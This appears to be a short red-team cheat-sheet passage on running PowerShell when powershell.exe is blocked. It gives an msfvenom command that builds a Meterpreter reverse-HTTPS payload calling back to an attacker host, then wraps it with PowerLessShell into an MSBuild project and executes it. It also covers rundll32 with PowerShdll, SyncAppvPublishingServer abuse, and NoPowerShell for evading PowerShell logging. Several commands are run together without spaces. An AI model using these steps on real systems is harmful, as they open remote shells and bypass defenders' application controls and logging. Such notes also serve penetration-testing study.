Powershell.exe is just a process hosting the System.Management.Automation.dll which essentially is the actual Powershell as we know it. If you run into a situation where powershell.exe is blocked and no strict application whitelisting is implemented, there are ways to execute powershell still.
Practice
PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the PowerShell process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.
#Generate a malisious powershell scriptv4resk@kali$ msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1
#Generate a .csproj with PowerLessShellv4resk@kali$python2PowerLessShell.py-typepowershell-source/tmp/liv0ff.ps1-outputliv0ff.csproj#Execute it on the target with MSBuild.exeC:\Users\thm>c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exec:\Users\thm\Desktop\liv0ff.csproj
We can load PowerShdll with rundll32.exe to gain a shell
C:\Users\v4resk>rundll32.exePowerShdll.dll,main
Windows 10 comes with SyncAppvPublishingServer.exe and SyncAppvPublishingServer.vbs that can be abused with code injection to execute powershell commands from a Microsoft signed script:
NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms.
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe:
